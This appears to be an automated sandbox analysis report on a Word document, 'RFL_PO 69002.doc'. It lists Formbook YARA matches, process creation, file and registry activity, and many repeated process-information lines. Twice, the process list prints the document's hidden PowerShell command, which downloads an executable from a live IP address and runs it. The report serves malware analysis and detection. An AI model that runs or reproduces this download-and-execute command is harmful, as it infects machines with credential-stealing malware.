Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: nothinglittle.exe.9.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@8/13@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{BCE875CA-B705-4E9B-879E-D1A9B6F412E9} - OProcSessId.dat

Jump to behavior

Source: RFL_PO 69002.doc

OLE indicator, Word Document stream: true

Source: RFL_PO 69002.doc

OLE document summary: title field not present or empty

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\Public\Documents\nothinglittle.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: RFL_PO 69002.doc	Virustotal: Detection: 15%
Source: RFL_PO 69002.doc	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Users\Public\Documents\nothinglittle.exe	Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Users\Public\Documents\nothinglittle.exe	Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: nothinglittle.exe, 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nothinglittle.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000003.269897366.00000246F5519000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.275702172.0000000000D12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.431614413.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491282271.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.269964305.00000246F5559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.432793873.0000000000D12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.270059630.00000246F555A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.430227602.0000000001416000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432322254.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nothinglittle.exe PID: 6988, type: MEMORY
Source: Yara match	File source: Process Memory Space: nothinglittle.exe PID: 6172, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe, type: DROPPED
Source: Yara match	File source: 9.2.nothinglittle.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.nothinglittle.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.7d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.7d0000.0.unpack, type: UNPACKEDPE

Source: nothinglittle.exe.9.dr

Static PE information: 0xD669075E [Tue Dec 28 08:16:30 2083 UTC]

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03024E5C pushad ; iretd
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03025265 push ecx; retf
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_030262B5 push 8BFFFFFEh; retf
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00417B68 push ebx; ret
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CEB5 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF6C push eax; ret
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF02 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF0B push eax; ret
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_004167E2 push esi; retf
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0040C78D push ecx; iretd
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012DD0D1 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126322C push eax; retf
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01269271 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126427E pushad ; retf 000Dh
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126225E push eax; retf
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01264288 pushad ; retf
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126A7C0 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01263F9F pushad ; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.99300765862

Source: C:\Users\Public\Documents\nothinglittle.exe

File created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
